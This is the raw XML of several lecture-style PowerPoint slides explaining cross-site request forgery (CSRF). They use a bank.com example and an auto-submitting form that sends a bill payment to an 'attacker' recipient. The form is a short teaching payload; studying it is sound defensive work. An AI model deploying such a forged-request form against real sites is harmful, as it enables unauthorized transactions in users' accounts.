          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3676589" y="2076473"/>
            <a:ext cx="1608950" cy="384531"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId2" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4793B73B-63F5-744F-A277-8923601236CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2055370" y="4772134"/>
            <a:ext cx="4269740" cy="521334"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4269740" h="521335">
                <a:moveTo>
                  <a:pt x="4058" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="37884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4153550" y="482907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4149491" y="520790"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4269229" y="476142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4220720" y="445023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4157609" y="445023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4058" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4269740" h="521335">
                <a:moveTo>
                  <a:pt x="4161668" y="407140"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4157609" y="445023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4220720" y="445023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4161668" y="407140"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="40458C"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{733E7067-E0F1-6B4B-AE26-3DD5CF8A6945}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2819400" y="3410059"/>
            <a:ext cx="4269740" cy="521334"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4269740" h="521335">
                <a:moveTo>
                  <a:pt x="107561" y="407140"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="476142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119738" y="520790"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="115679" y="482907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="469264" y="445023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111620" y="445023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107561" y="407140"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4269740" h="521335">
                <a:moveTo>
                  <a:pt x="4265170" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="111620" y="445023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="469264" y="445023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4269229" y="37884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4265170" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="40458C"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{913FBA8A-F91C-A241-AEAB-B46FA989C69F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2819400" y="5619859"/>
            <a:ext cx="4269740" cy="521334"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4269740" h="521335">
                <a:moveTo>
                  <a:pt x="107561" y="407140"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="476141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119738" y="520789"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="115679" y="482906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="469254" y="445023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111620" y="445023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107561" y="407140"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4269740" h="521335">
                <a:moveTo>
                  <a:pt x="4265170" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="111620" y="445023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="469254" y="445023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4269229" y="37883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4265170" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="40458C"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10F7298F-DC65-9541-B7FF-2C1104AFB712}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3163849" y="3306607"/>
            <a:ext cx="1216854" cy="276870"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="object 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71FD366A-CCBA-BB43-B0BA-8EC859C6218E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4489952" y="3162212"/>
            <a:ext cx="1490744" cy="298355"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="object 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B24B369D-ADFD-9A45-889D-18B5194C32C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3415255" y="4387275"/>
            <a:ext cx="2391191" cy="711652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="object 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DB4F073-5216-BD40-9379-15F7AD1A7E2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4115255" y="5555010"/>
            <a:ext cx="984340" cy="248127"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId6"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32434145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D6879F-1ADB-C74A-BD10-60E2E936EE77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D95FECA-6688-EE45-8D9A-B456552215DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8839200" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>User logs in to bank.com.                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>ession cookie remains in browser state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>User visits malicious website containing:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser sends user auth cookie with request                                       forged </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="251F07"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>transaction </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="251F07"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>will </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="251F07"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="251F07"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="251F07"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>fulfilled</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31425726-79BE-C940-B768-D815DE800B19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="3276600"/>
            <a:ext cx="6705600" cy="1080424"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="15875" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="186690">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="125"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1052830" algn="l"/>
                <a:tab pos="2148205" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5D4C10"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>&lt;form	name=F	action=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5D4C10"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://bank.com/BillPay.php</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5D4C10"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="202565">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="565"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1111885" algn="l"/>
                <a:tab pos="3115310" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5D4C10"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>&lt;input	name=recipient	value=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5D4C10"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5D4C10"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5D4C10"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5D4C10"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="202565">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="470"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5D4C10"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>&lt;script&gt; document.F.submit();</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5D4C10"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5D4C10"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="79995468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F29319-B9E0-8349-953B-8BB70EDE395E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07025800-A40F-D248-8B87-EB611AD54EC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="481476" y="1710581"/>
            <a:ext cx="8195615" cy="4614019"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId2" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9E59B91-853A-EB41-A273-8884EBBC8290}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1760400" y="3276000"/>
            <a:ext cx="2818800" cy="2182814"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2786379" h="1622425">
                <a:moveTo>
                  <a:pt x="0" y="1622423"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2786062" y="1622423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2786062" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1622423"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E61B65D-707D-924F-853D-95B28A81A489}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4676400" y="3455986"/>
            <a:ext cx="2793600" cy="2335214"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2786379" h="3176904">
                <a:moveTo>
                  <a:pt x="0" y="3176587"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2786062" y="3176587"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2786062" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3176587"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="222973831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43EB3-1D2E-6849-806A-8900234B8D41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74245ACE-9561-1D49-81DC-6008F8D86182}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="481476" y="1710000"/>
            <a:ext cx="8195615" cy="4614019"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId2" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B52583A5-2D5C-3B43-A8B1-1EB251D36A07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4269738" y="6527800"/>
            <a:ext cx="1816100" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202346"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202346"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>ser</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-50" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202346"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202346"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>credentials</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
